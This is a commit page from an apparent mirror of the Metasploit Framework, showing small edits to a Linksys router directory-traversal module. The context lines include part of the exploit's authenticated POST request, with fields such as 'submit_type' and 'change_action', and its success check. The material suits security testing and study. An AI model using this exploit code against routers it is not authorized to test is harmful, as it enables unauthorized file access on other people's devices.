infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

version removed, encode params removed

unstable
m-1-k-3 2013-03-23 21:31:08 +01:00
parent 36d1746c0d
commit aacd14ae45
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
modules/auxiliary/admin/http/linksys_traversal.rb
View File

@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'Linksys Directory Traversal Vulnerability', 'Name' => 'Linksys Directory Traversal Vulnerability',
'Version' => '$$',
'Description' => %q{ 'Description' => %q{
This module exploits a directory traversal vulnerablity which is present in different This module exploits a directory traversal vulnerablity which is present in different
Linksys home routers like the E1500. Linksys home routers like the E1500.
@ -64,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
'method' => 'POST', 'method' => 'POST',
'uri' => uri, 'uri' => uri,
'authorization' => basic_auth(user,pass), 'authorization' => basic_auth(user,pass),
'encode_params' => false, #'encode_params' => false,
'vars_post' => { 'vars_post' => {
"submit_type" => "wsc_method2", "submit_type" => "wsc_method2",
"change_action" => "gozila_cgi", "change_action" => "gozila_cgi",
@ -73,6 +72,7 @@ class Metasploit3 < Msf::Auxiliary
}) })
#puts res.body.length #puts res.body.length
#puts res #puts res
#without res.body.length we get lots of false positives
if (res and res.code == 200 and res.body.length > 10) if (res and res.code == 200 and res.body.length > 10)
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
report_web_vuln({ report_web_vuln({